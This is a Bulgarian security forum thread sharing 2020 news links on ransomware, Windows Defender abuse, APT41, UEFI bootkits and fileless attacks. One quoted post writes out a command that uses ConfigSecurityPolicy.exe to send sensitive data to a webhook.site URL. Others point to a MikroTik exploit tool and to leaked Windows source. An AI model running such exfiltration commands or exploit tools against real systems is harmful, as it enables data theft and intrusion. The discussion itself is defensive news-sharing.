Windows Defender започва да отчита блокирането на телеметрията в hosts файла като риск за безопасността и няма  да позволи промените на файла, докато не разрешите тази операция в Defender:
https://www.windowslatest.com/2020/09/07/windows-10-defender-flags-hosts-file-telemetry-blocking/

Персонализирани теми за Windows могат да крадат потребителските данните
https://winaero.com/blog/reportedly-custom-themes-can-be-used-to-steal-windows-10-user-credentials/

https://thehackernews.com/2020/09/raccoon-ssl-tls-encryption.html
https://raccoon-attack.com/RacoonAttack.pdf

Вие закърпихте ли се?

https://arstechnica.com/information-technology/2020/09/new-windows-exploit-lets-you-instantly-become-admin-have-you-patched/
 

Цитат

In a statement, Microsoft wrote: “A security update was released in August 2020. Customers who apply the update, or have automatic updates enabled, will be protected.”

 

Maze изнудвачът вече криптира посредством виртуални машини за да избегне засичането от антивирусния софтуер:

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts-via-virtual-machines-to-evade-detection/

Пациентка починала след рансъмуеър атака

https://arstechnica.com/information-technology/2020/09/patient-dies-after-ransomware-attack-reroutes-her-to-remote-hospital/

Microsoft премахна възможността за изтегляне на файлове с помощта на Windows Defender

https://www.comss.ru/page.php?id=7989

преди 2 часа, Maxim Todorov написа:

Microsoft премахна възможността за изтегляне на файлове с помощта на Windows Defender

https://www.comss.ru/page.php?id=7989

Червените веднага намериха и друг начин:

https://twitter.com/NtSetDefault/status/1302589153570365440

 

Цитат

Apparently ConfigSecurityPolicy can also be used to data exfiltration and more... "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe" C:\temp\config.xml "https://webhook.site/xxxxxxx-xxxxx-xxxxx-xxxxxxxxx?sensitive_data…"

 

UEFI Secure Boot Customization

https://media.defense.gov/2020/Sep/15/2002497594/-1/-1/0/CTR-UEFI-Secure-Boot-Customization-UOO168873-20.PDF

преди 20 часа, Вaсил написа:

Червените веднага намериха и друг начин:

https://twitter.com/NtSetDefault/status/1302589153570365440

И май не е само това.

https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/

преди 43 минути, B-boy/StyLe/ написа:

И май не е само това.

https://www.bleepingcomputer.com/news/security/windows-10-finger-command-can-be-abused-to-download-or-steal-files/

Чакам официално да го одобрят и качат в репозиторията  До тук са 125.

Интересна находка е :

http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt

Червените и рансъм картелите ще са доволни...

Цитат

One of the men indicted as part of APT41 — now 35-year-old Tan DaiLin — was the subject of a 2012 KrebsOnSecurity story that sought to shed light on a Chinese antivirus product marketed as Anvisoft. At the time, the product had been “whitelisted” or marked as safe by competing, more established antivirus vendors, although the company seemed unresponsive to user complaints and to questions about its leadership and origins.

Цитат

Chinese Antivirus Firm Was Part of APT41 ‘Supply Chain’ Attack

https://krebsonsecurity.com/2020/09/chinese-antivirus-firm-was-part-of-apt41-supply-chain-attack/

И те така с китайските антивирусни. Anvil май присъстваше и като скенер във VT. Патокът Доналд не си измисля политиките сам. Има доста по-умни хора от него, дето ги мислят тези неща.

 

Това ме изкефи:

Цитат

A review of Anvisoft’s website registration records showed the company’s domain originally was created by Tan DaiLin, an infamous Chinese hacker who went by the aliases “Wicked Rose” and “Withered Rose.” At the time of story, DaiLin was 28 years old.

Някой сценарист в Нетфликс явно е знаел повече...

преди 16 минути, Мальчик Бананан написа:

https://krebsonsecurity.com/2020/09/chinese-antivirus-firm-was-part-of-apt41-supply-chain-attack/

И те така с китайските антивирусни. Anvil май присъстваше и като скенер във VT. Обърках имената. Патокът Доналд не си измисля политиките сам. Има доста по-умни хора от него, дето ги мислят тези неща.

 

Това ме изкефи:

Някой сценарист в Нетфликс явно е знаел повече...

 

Нови вектори,повече агресивност.АPT TTPs (Tactics, Techniques, and Procedures) в действие...

Цитат

"Criminals behind ransomware attacks are adapting their attack vectors, they're more aggressive than in the past – they're not only encrypting the files, they're also exfiltrating data and making it available," he explained. "From a law enforcement perspective we have been monitoring this evolution."

https://www.zdnet.com/article/ransomware-is-evolving-but-the-key-to-preventing-attacks-remains-the-same/

Повече инфо за APT тук:

                                 attack.mitre.org

 

 

Mдам,сорсовете на Windows XP и Windows Server 2003 се пльоснаха публично след толкова "криене".

Публично има единствено такива снимчици, а реален достъп отново и единствено по слухове, можело да имат някои си... 

преди 48 минути, Joss Bomon написа:

Публично има единствено такива снимчици, а реален достъп отново и единствено по слухове, можело да имат някои си... 

Заповядай и едно файлче

xp.cmd  

ПС: Аре нека са две-и x.cmd  Win2K3

преди 58 минути, Joss Bomon написа:

реален достъп отново и единствено по слухове

И не само - има го и на хост, има го и по тракерите. <3GB архив.

Mikrotik exploit from Vault 7 CIA Leaks automation tool. Takeovers up to RouterOS 6.38.4

mikrot8over

mikrot8over: Fast exploitation tool for Mikrotik RouterOS up to 6.38.4

 

https://github.com/vulnersCom/mikrot8over

Едно интересно четиво:

Phantom Malware: Conceal Malicious Actions From Malware Detection Techniques by Imitating User Activity

https://ieeexplore.ieee.org/document/9186656

ESET откри рядка APT атака, която е останала неоткрита в продължение на 9 години.

https://www.zdnet.com/article/eset-discovers-a-rare-apt-that-stayed-undetected-for-nine-years/

https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/

 

 

Ново ръководство за употреба за възможностите на последната версия на VoodooShield:

https://www.voodooshield.com/Download/VoodooShieldUserGuide.pdf

Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?

https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower

има и други интересни статии на сайта на CyberArk.

https://thehackernews.com/2020/10/antivirus-software-vulnerabilities.html

Статията малко прилича на това, което прави инструмента EOPRadar:

https://www.wilderssecurity.com/threads/eopradar-privilege-escalation-vulnerability-scanner.406671/

Касперски са открили сложен UEFI зловреден софтуер от китайски произход, който вилнее от 2015-та година:

https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild

https://www.zdnet.com/article/chinese-hacker-group-spotted-using-a-uefi-bootkit-in-the-wild/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/05094208/MosaicRegressor_Technical-details.pdf

Добрата новина е, че се изисква физически достъп до системата за да може тя да бъде заразена.

 

Нова FileLess (без да се използват файлове) атака използва услугата WerFault (Error Reporting Service) на Windows (може би поредния LOLBIN) за да компрометира системите:

https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-service-in-fileless-malware-attack/

По-детайлно описание:

https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/

Изглежда не е нещо ново и може би е добре, човек да разшири списъка си с уязвими процеси (LOLBINS) в списъка на защитната си програма:

Цитат

The same process injection technique is used by other malware to bypass detection, including both Cerber ransomware and NetWire RAT.

 

на 7.10.2020 г. в 7:53, B-boy/StyLe/ написа:

Нова FileLess (без да се използват файлове) атака използва услугата WerFault

Ммм,Cobalt Strike+CactusTorch...очаквано добра червена комбинация.Идеален пример какъв е резултата когато правилните инструменти попаднат в "неправилни" ръце.

 

Ще ме прощавате за спама